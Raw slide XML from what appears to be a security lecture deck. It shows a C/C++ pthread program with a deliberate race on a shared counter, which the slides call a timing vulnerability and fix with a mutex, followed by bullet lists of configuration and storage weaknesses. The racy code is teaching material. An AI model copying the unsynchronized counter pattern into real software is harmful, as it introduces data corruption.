            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>raced count: 105, should be: 400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Johns-MacBook-Pro-3:cryptobin jlm$ ./race_example.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>raced count: 400, should be: 400</a:t>
            </a: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133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08595021-246B-0D4A-ADB3-10C6F2AFF4AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386542" y="1683021"/>
            <a:ext cx="11418916" cy="22870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Two asynchronous threads reading and writing the same variable.  If one thread reads a value while a second thread writes the variable, data (and hence control) can become unstable.</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Correct use of synchronization primitives (like mutexes) fixes this.</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The program on the next page has a race if  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STOP_RACE is not defined.  Defining STOP_RACE fixes the race and hence the timing vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Here is sample output with STOP_RACE not defined in the first run and defined in the second.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000"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2196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The timing example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275809" y="2142751"/>
            <a:ext cx="3817891" cy="2317652"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Includes and defines omitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int g_count = 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#ifdef STOP_RACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>std::mutex my_mutex;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void* worker(void* arg) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int n;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  srand(5);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  //loop on next panel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return nullptr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="14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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28FD86C-86C9-A846-9C74-B4CB2E4641BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309532" y="1721485"/>
            <a:ext cx="4712677" cy="4531822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="0" tIns="0" rIns="0" bIns="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400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int main(int an, char** av) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pthread_t threads[NUMTHREADS];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  for (int i = 0; i &lt; NUMTHREADS; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    pthread_create(&amp;threads[i], NULL, worker,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                   (void*) &amp;g_count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  for (int i = 0; i &lt; NUMTHREADS; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    int r = pthread_join(threads[i], NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    printf("Thread %d terminated\n", i);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  printf("raced count: %d, should be: %d\n",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          g_count, NUMTHREADS * NCYCLES);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="20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7D8A9AE8-3845-9F4E-80B1-D060B35B6986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3602632" y="2110804"/>
            <a:ext cx="3817891" cy="2317652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="0" tIns="0" rIns="0" bIns="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400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for (int k = 0; k &lt; NCYCLES; k++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#ifdef STOP_RACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    my_mutex.lock();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    n = *((int*)arg);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    int m = rand();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if ((m%4) == 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      sleep(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    n++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    *((int*)arg) = n;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#ifdef STOP_RACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    my_mutex.unlock();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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8393693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Configuration vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1672388"/>
            <a:ext cx="11582400" cy="4329299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Empty passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Default passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Open IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Allow scripts to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Put “standard users” in administrator group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Open ports dangerous ports without authentication (e.g. – telnet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bad update policies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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34503113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836" y="326594"/>
            <a:ext cx="11446328" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Storage vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471056" y="1981201"/>
            <a:ext cx="11231840" cy="4305300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unencrypted storage – anyone with access to removeable media may read data and change values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Poor key protection – insecurely storing keys can reveal the keys.</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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5BD502-044A-0347-B865-D33918CB61D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7821386" y="5715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45613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3" y="-55350"/>
            <a:ext cx="11905881" cy="986685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentication and authorization vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
